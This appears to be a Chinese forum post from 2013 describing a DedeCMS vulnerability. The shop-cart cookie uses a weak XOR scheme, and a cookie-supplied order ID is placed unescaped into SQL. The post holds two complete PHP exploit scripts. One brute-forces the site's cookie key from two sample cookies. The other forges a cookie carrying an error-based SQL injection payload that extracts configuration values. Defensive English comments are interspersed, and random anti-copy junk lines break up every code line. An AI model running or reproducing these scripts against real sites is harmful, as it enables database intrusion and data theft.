标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
$ ~- w9 ~" w3 h0 q* Q+ T5 s" X! z
在 include/shopcar.class.php中
% T' H8 _2 H; }+ v
先看一下这个shopcar类是如何生成cookie的
7 I: c" U( {& y# w/ w/ n7 }: c
// Persists one shop-cart value as a client-side cookie.
// $key    cookie name; $value  scalar or array. Arrays are first flattened by
// $this->enCode() (not shown here; the text above describes its output as an
// a=yy&b=cc style string) and then, like scalars, passed through enCrypt().
// Security note: enCrypt()/setKey() (lines 186 and 213 below) are a reversible
// XOR encoding with no integrity check, so whoever recovers the static key can
// forge any cart cookie, and the server will trust whatever comes back here.
// Defensive fix: authenticate the cookie (HMAC over the value with a
// server-side secret, constant-time verify on read) or keep cart state
// server-side behind an opaque session identifier.
239 function saveCookie($key,$value)
( [, x5 ?4 R. X5 o' h9 G5 _$ F/ ^
240 {
7 W- e8 Q. i/ ^7 C/ L) X
241 if(is_array($value))
k8 `3 \- C" w# O
242 {
0 ?, P; F: u6 ?4 r3 f
243 $value = $this->enCrypt($this->enCode($value));
. }" c) Q2 r2 q: E/ R2 ~
244 }
3 j& A- M; g/ }5 M4 i! {. y
245 else
# X) E/ H4 o# d* ]+ e" ?) p
246 {
( T3 G& y9 F& B4 b2 u4 ]0 r9 K
247 $value = $this->enCrypt($value);
0 |2 N. M# `) C1 O. e9 ^, a2 B
248 }
: s) K- v/ u [5 m: c
// Cookie lives for 36000 s (10 h) and is scoped to the whole site ('/').
249 setcookie($key,$value,time()+36000,’/');
. c( x# _$ n1 e9 H: x" j
250 }
1 {9 Z3 N( o3 O2 L5 R. c
简单地说,$key 就是 cookie 的键名,$value 就是 cookie 的值;enCode 的作用是把数组转换成 a=yy&b=cc&d=know 这样的查询串形式,关键在于 enCrypt 函数。
2 @- |/ J E7 h4 X+ m. q6 C8 ?. T4 z( \
// Obfuscates $txt with a fresh per-call key and then with the site-wide key
// (setKey()). Returns the base64 string that saveCookie() stores in the cookie.
// Weaknesses visible in this function:
//  * the per-call key is md5(rand(0, 32000)); rand() bounds are inclusive, so
//    there are only 32001 possible keys, few enough to enumerate;
//  * each key byte is written in the clear next to the byte it masks (line 195),
//    so with a known plaintext the whole intermediate $tmp is recoverable;
//  * nothing authenticates the result, so it is malleable.
// Defensive fix: replace this with an HMAC-authenticated value under a proper
// random secret, and never derive keys from rand()/microtime().
186 function enCrypt($txt)
: X: D% _ f0 N8 F+ ?! C; ?4 q( f9 Q
187 {
) r. ~3 ~" Y& X" b0 X" g6 Y) A
// Seeds the non-cryptographic PRNG from the clock; the seed is irrelevant
// to the weakness because the key space below is tiny regardless.
188 srand((double)microtime() * 1000000);
7 h# _+ r8 y4 H7 _9 U
// 32 hex chars; at most 32001 distinct values.
189 $encrypt_key = md5(rand(0, 32000));
* W( E# g4 }& g0 A" I2 ~
190 $ctr = 0;
p/ [6 Z# W# \+ w: ?# K# V0 M
191 $tmp = ”;
% Q& u5 m2 q) v8 H5 x5 S
192 for($i = 0; $i < strlen($txt); $i++)
! [% u* Y) C3 k1 i+ e' X* }0 ^
193 {
% x1 D# k1 j; m9 ?, j
// Wrap the key index after the 32 chars of the md5.
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& g+ I; w. |0 ]$ @; e3 i7 ]
// Output pair per input byte: key char, then plaintext char XOR that same
// key char. The key travels inside the "ciphertext".
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
9 g4 Z& C; W& H( p' i4 ]- {
196 }
/ K" ^; U: ~' N3 A
// Second pass: XOR $tmp with the static md5($cfg_cookie_encode) (line 213
// below) and base64-encode. XOR with a known plaintext reveals the key, so a
// user who knows their own cart plaintext can narrow the static key to a few
// hundred candidates from one cookie and pin it with a second one (see the
// text below).
197 return base64_encode($this->setKey($tmp));
7 o, C# `/ H% |4 ^
198 }
& R0 N0 j3 c$ O, P" s* s
// XORs $txt with the fixed 32-byte key stream md5(strtolower($cfg_cookie_encode)),
// repeating the key every 32 bytes. enCrypt() applies this to every cookie.
// This is repeating-key XOR with one key stream reused across all cookies:
// 32 bytes of known plaintext/ciphertext recover the whole key, and the output
// can be modified bit-for-bit without detection (no MAC).
// Defensive fix: a keyed MAC (e.g. HMAC-SHA256) over the value with a secret
// that is not a simple derivation of a lower-cased config string.
213 function setKey($txt)
3 V9 r0 L! p. J; e' `1 a( R
214 {
) M ]: a5 e* U& M0 i8 s# R8 s
// Site-wide secret from the configuration; lower-casing before hashing
// discards any case entropy in the configured value.
215 global $cfg_cookie_encode;
& i" B8 _! M1 H- r9 ~. N
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
/ B: s6 |2 e# [# D5 x
217 $ctr = 0;
" @& m$ E1 c( t: O0 O9 E
218 $tmp = ”;
; G7 {+ C& e' E: m) j, j0 Z) i% J
219 for($i = 0; $i < strlen($txt); $i++)
. S7 J( M: p" a Q2 L3 t0 N/ V
220 {
1 [/ I; c0 ^# O) f- j
// Wrap the key index after 32 key chars.
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ w2 e, i1 n0 @9 v' q( X7 R l: H: \
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
- t- `$ D( f, F& C' u
223 }
$ _* E% U" v, q: W* U$ g
224 return $tmp;
% m# d. Y( N1 t, _
225 }
& k1 g8 S+ E% _. r9 Z+ F6 Q. N+ l
enCrypt 的参数 $txt 是我们可知的;它的返回值就是 cookie 的值,这也是我们可知的。
2 M+ B. T5 r" P5 b
接着看 enCrypt 调用 setKey 时传入的参数 $tmp。这个参数在某种意义上我们也是可知的:因为 $encrypt_key = md5(rand(0, 32000)) 只有 32000 种可能,所以可以推出 32000 种可能的 $tmp,进而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了,忘记说了,我们的目的是推测出 setKey 中 $encrypt_key 的值,有了它才能任意构造购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中,简单过滤掉含非字母数字字符的 key,就只剩下几百个可能的 key;然后重新下一次订单,再获取几百个可能的 key,两者取交集,就得到最终的 key。
. O$ G3 ]: U1 b3 @7 B1 Y
具体代码如下:
; q: G% V7 Q: J u z
<?php
// Key-recovery demonstration for the DedeCMS shop-cart cookie scheme quoted
// above. It needs two cookies produced from the same known plaintext and relies
// on enCrypt()/setKey() being a known-plaintext-recoverable XOR with only
// 32001 possible per-cookie keys.
// Defender's takeaway: a cookie value that is only "encrypted" and not
// authenticated must be treated as attacker-controlled on the server.
- C! ?6 N3 h7 {6 {
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
; ^. T( F- B( d, N5 u
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
0 {! j1 n- F3 Y5 l
// The expected cart plaintext (enCode() output format, cf. the text below).
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 }; X$ J0 Y! @& Z
// Recovers the first 32 bytes of the static key stream. Because the cookie is
// base64(setKey($tmp)) and setKey() is XOR with a 32-byte repeating key, XORing
// the decoded cookie with a candidate $tmp ($string) byte-for-byte yields the
// candidate key; 32 bytes suffice since the key repeats after that.
// $code    base64 cookie value; $string  candidate intermediate text.
// Assumes both decode to at least 32 bytes — not checked here.
// Returns the 32-byte candidate key.
function reStrCode($code,$string)
+ t, u. p1 d% U8 z/ d
{
- G& H- {1 m' A& |0 T1 i
$code = base64_decode($code);
& |3 O$ f' h2 y% F
$key = “”;
) i8 _ d( D( d% Y1 |* ?/ c
for($i=0 ; $i<32 ; $i++)
' z4 {$ [* b h# W3 x6 Q* e6 d
{
9 N- Q8 @* G8 m _- d8 o
// ciphertext XOR known intermediate = key byte
$key .= $string[$i] ^ $code[$i];
* f. O# S+ [3 ]( T$ S
}
% A f8 H) z' F* r2 f B. J
return $key;
7 L/ F( G3 r; I! H
}
+ K: P% y) _3 s* H- H
// Enumerates the per-cookie key space. For each j in 0..31999 it rebuilds $tmp
// exactly as the server's enCrypt() does with md5(j), derives the static-key
// candidate with reStrCode(), and keeps those that look like an md5 hex digest
// ([a-z0-9] only). Surviving candidates are echoed and returned.
// $cookie   observed cookie (base64); $plantxt  the known cart plaintext.
// Returns the list of plausible 32-char keys (a few hundred, per the text below).
function getKeys($cookie,$plantxt)
& j# ]/ l4 U. k
{
' F6 W; a" o! c. N U6 D; h% P- w* c
// overwritten inside the loop before it is read
$tmp = $cookie;
5 g9 G- b4 Q( z
$results = array();
" R/ x) A- C! P: Q7 A8 g. n
for($j=0 ; $j < 32000; $j++)
- P1 s7 V9 n- V
{
% K, u$ t' |3 }$ M
^8 |6 W9 `) C# ]" R) r
$txt = $plantxt;
9 j% ^) l/ }0 s4 i
$ctr = 0;
% ^ o/ e u* { [
$tmp = ”;
n$ ]/ [, p& d5 o* y
// Candidate per-cookie key, mirroring md5(rand(0, 32000)) on the server.
$encrypt_key = md5($j);
1 u* ?2 ]% ?0 d: l8 }( C
for($i =0; $i < strlen($txt); $i ++)
; I! U$ _7 x5 `* D4 z! P
{
7 h, n. W: B: `4 [* }
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
/ d$ a+ | r. H' A8 M' A" Q
// Same interleaving as the server: key char, then masked plaintext char.
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
8 h4 e, o1 r% m' l6 a
}
' S4 W# v' G, u) n2 C
$string = $tmp;
+ Z: @9 q2 ^: X7 f
$code = $cookie;
/ d. G G7 ~, z2 ?& b X! e' F
$result = reStrCode($code,$string);
- [" g# u) C& k4 K
// An md5 digest is hex ([0-9a-f]); the broader [a-z0-9] test is a cheap
// first filter that discards candidates that cannot be the key.
if(eregi(‘^[a-z0-9]+$’,$result))
$ r5 o( a( s1 w, g9 m0 P
{
0 x3 D* N7 x1 [$ D; o
echo $result.”\n”;
- R% i/ S" [8 j0 X: v$ V6 C
$results[] = $result;
2 w" c6 n% W2 |# ?: ?
}
5 |! N& Q0 ^& D/ Q0 V/ {! y+ ~
}
: d: l5 k3 q# F5 S: [: l
return $results;
, t3 N! i/ l+ D9 p
}
3 B1 U9 z$ M+ N% m& a& @
// Two cookies from two orders with the same plaintext: the genuine static key
// is present in both candidate lists, so their intersection isolates it.
$results1 = getKeys($cookie1,$plantxt);
R. A% X; {" m
$results2 = getKeys($cookie2,$plantxt);
+ A: G) F, ~4 }+ p
print “\n——————–real key————————–\n”;
d6 _) p+ A+ c' r% q8 ?% C" r X& A2 S
// Pairwise comparison; prints every value common to both lists.
foreach($results1 as $test1)
: \* u9 X. A2 M2 g4 ~3 s
{
3 |$ {/ S1 ^8 x# g; \; _6 C
foreach($results2 as $test2)
1 ?6 {! p) R/ d/ s3 a5 f" g
{
# @/ M: Y1 ]% C
if($test1 == $test2)
" a* c% @7 R7 e- i/ ?
{
8 I. J: `. R9 q1 y
echo $test1.”\n”;
4 n: ? R' x: E( x* H6 g% k) f
}
9 B- `* Z) j* U) v( J( V, F
}
% g- w4 Z) n) V% V9 [! B
}
: d& ~- J7 r, `/ ]% |4 L; E: o5 k
?>
5 n+ s P0 p$ c4 H8 r5 B, x* l* S
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
& _6 Z( R* A% T3 q% m: K1 N2 K
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
1 k s3 y# ?% z6 O% ]0 r( \: D
然后推算出md5(strtolower($cfg_cookie_encode))
5 R8 d% L6 `" b; t' Z0 I
得到这个key之后,我们就可以构造任意购物车的cookie
/ Z7 T& @' ~9 F' o" M4 o1 g* X
接着看
: L" @ O0 U' T) v4 @1 Y2 M1 L
20 class MemberShops
9 s" B* |6 [, w3 Q
21 {
/ U8 L* u4 ]: _- [5 T
22 var $OrdersId;
- H' l5 S& b# o1 M5 Z. K/ ?
23 var $productsId;
, {6 @9 J5 k2 w( o( v: G! c
24
5 a; t, f: E' H% f
// Constructor: takes the order id straight from the client cookie and only
// falls back to MakeOrders() when the cookie is absent or empty. getCookie()
// is not shown here; presumably it reverses enCrypt()/setKey(). Because that
// encoding is forgeable (see above), $this->OrdersId is client-controlled from
// this point on and must be validated before it reaches SQL.
25 function __construct()
7 X9 Q9 Z' ? j2 K
26 {
; B6 \( f* j5 D
27 $this->OrdersId = $this->getCookie(“OrdersId”);
, H9 _$ X7 ^ l7 L7 \2 Y; r
28 if(empty($this->OrdersId))
* _) G8 O) S0 v1 i. d8 |6 a
29 {
2 T3 |2 B0 E' J$ |2 l! E4 E) k
// Only a missing cookie yields a server-generated id.
30 $this->OrdersId = $this->MakeOrders();
9 c+ {4 G1 f4 J$ l1 s# M
31 }
/ C/ s8 l( N8 Z8 G+ _
32 }
; V# c0 T$ q7 k/ t
可以看到 OrdersId 是直接从 cookie 里获取的
9 E. d5 ^( X/ f1 N0 w
然后
) B9 N+ J6 H( J
/plus/carbuyaction.php中的
* X/ p: `& B9 e' E
// /plus/carbuyaction.php (excerpt): the cart object above is instantiated and
// its cookie-derived OrdersId is used directly.
29 $cart = new MemberShops();
: p: O# R8 o' @% r: ?
39 $OrdersId = $cart->OrdersId; // order id recorded for this request (from the OrdersId cookie)
* m5 i! Q$ L, l# q
……
. K( x5 r4 ^! b* ?, u% q
// $OrdersId is concatenated into the SQL string with no escaping and no
// parameter binding, so an unescaped quote in the value breaks out of the
// string literal. "#@__" is presumably the table-prefix placeholder — not
// shown here. Fix: bind $OrdersId as a query parameter, or validate it against
// the identifier format MakeOrders() produces before it is used.
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
; j$ d5 L! I1 h- x5 ~8 n* C* p( E
由于 $OrdersId 未经转义就直接拼接进了 SQL 语句,接着我们就可以注入了。
8 E% N7 r) M: s% [; q3 U
利用下面的代码生成 cookie:
* i6 k1 S) H0 ?! b
<?php
// Builds a forged OrdersId cookie for the server code quoted above.
// $txt is the value MemberShops::__construct() reads from the cookie and that
// carbuyaction.php line 173 interpolates unescaped into
// "SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId'". That unescaped
// interpolation of a client-controlled value is the SQL injection itself; the
// weak cookie encoding merely removes the barrier to setting the value.
// Vendor-side remediation: bind $OrdersId as a query parameter (or validate it
// against the expected identifier format) and authenticate the cookie.
# J4 b: N- c& F- ?% I
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
' d, o' ?* X' ~" X1 h$ R
// md5(strtolower($cfg_cookie_encode)) as recovered by the script above.
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
( m @# W: H' r9 V! ]
// Client-side copy of the server's setKey() (line 213 above), with the
// recovered static key in place of md5(strtolower($cfg_cookie_encode)).
// Repeating-key XOR under the same key stream the server uses, so the server
// decodes the result as genuine — which is exactly why an unauthenticated
// reversible encoding is not a trust boundary.
function setKey($txt)
! u( W5 C6 g5 W$ A# n3 c1 |" g
{
' R0 ~( f) C' c% ~
global $encrypt_key;
6 B' l2 t9 O% K2 n0 `
$ctr = 0;
5 v3 O9 s0 n4 ]- S4 a
$tmp = ”;
; c0 a/ G& s( {. H% u3 Y% l# c
for($i = 0; $i < strlen($txt); $i++)
& W# D" ^: ?# A& r% P" p
{
9 u* ^/ a! P$ P) }3 G% P
// Wrap the key index after 32 chars.
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
! U1 I! i3 M. {- Q; `5 |% \0 O
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
! C; B$ f4 a4 k9 V4 ^
}
9 N9 G6 @# ^5 d+ T" o$ T' o: ^% L
return $tmp;
! i, [0 Y- ^7 I' {4 z
}
4 h. V% H' K; k; @+ U( m
// Client-side copy of the server's enCrypt() (line 186 above): same per-call
// md5(rand()) key, same key-char/masked-char interleaving, same final setKey()
// pass and base64. Identical construction means the server's decoding path
// accepts the output without any way to tell it was not server-issued.
function enCrypt($txt)
* S( } O/ n" d" V* X5 Z' G
{
3 z: Q6 q% f+ Q+ G
srand((double)microtime() * 1000000);
- Z9 n% f, T$ ?7 T
$encrypt_key = md5(rand(0, 32000));
- a5 w1 j6 @: q# ^
$ctr = 0;
4 F* x7 K; |/ _ T+ |) J2 ]+ d; \* j
$tmp = ”;
5 S& G& w1 C+ k- u
for($i = 0; $i < strlen($txt); $i++)
, x- l. d. T8 C6 N7 L, F' B
{
. E& z; ~ {; E% H$ d3 G
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# v; O: ^6 l1 w5 O) C8 X; y
// key char followed by plaintext char XOR that key char
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
( J/ ` V' A8 `9 n+ y6 f+ {
}
+ s3 ]# i& B- ?' ~8 F7 _8 C
return base64_encode(setKey($tmp));
$ n& V2 E/ N2 V0 D- t
}
. `* x( L( D* p7 {, e
// Re-encodes until the base64 output contains no '+' (each enCrypt() call
// draws a fresh random per-call key). The reason is not stated; presumably to
// keep the value intact when sent as a cookie — TODO confirm.
for($dest =0;$dest = enCrypt($txt);)
% M6 a) O2 z- B- e
{
0 p* x* {* L2 F& \
if(!strpos($dest,’+'))
l# p" q, u8 {1 X
{
' o* T% a: v1 H3 A( N& I% ?
break;
# x+ O1 C: N: T. {& M9 h1 L
}
$ S* Z% D' p5 F& F2 I1 S3 d! l
}
* F# l7 m5 K9 x
echo $dest.”\n”;
+ G+ s* R- f) ~3 n$ W, u' F8 I/ `
?>
9 e1 P2 F& z0 c" E
1 A% z+ E& _9 I7 Y: Z: E c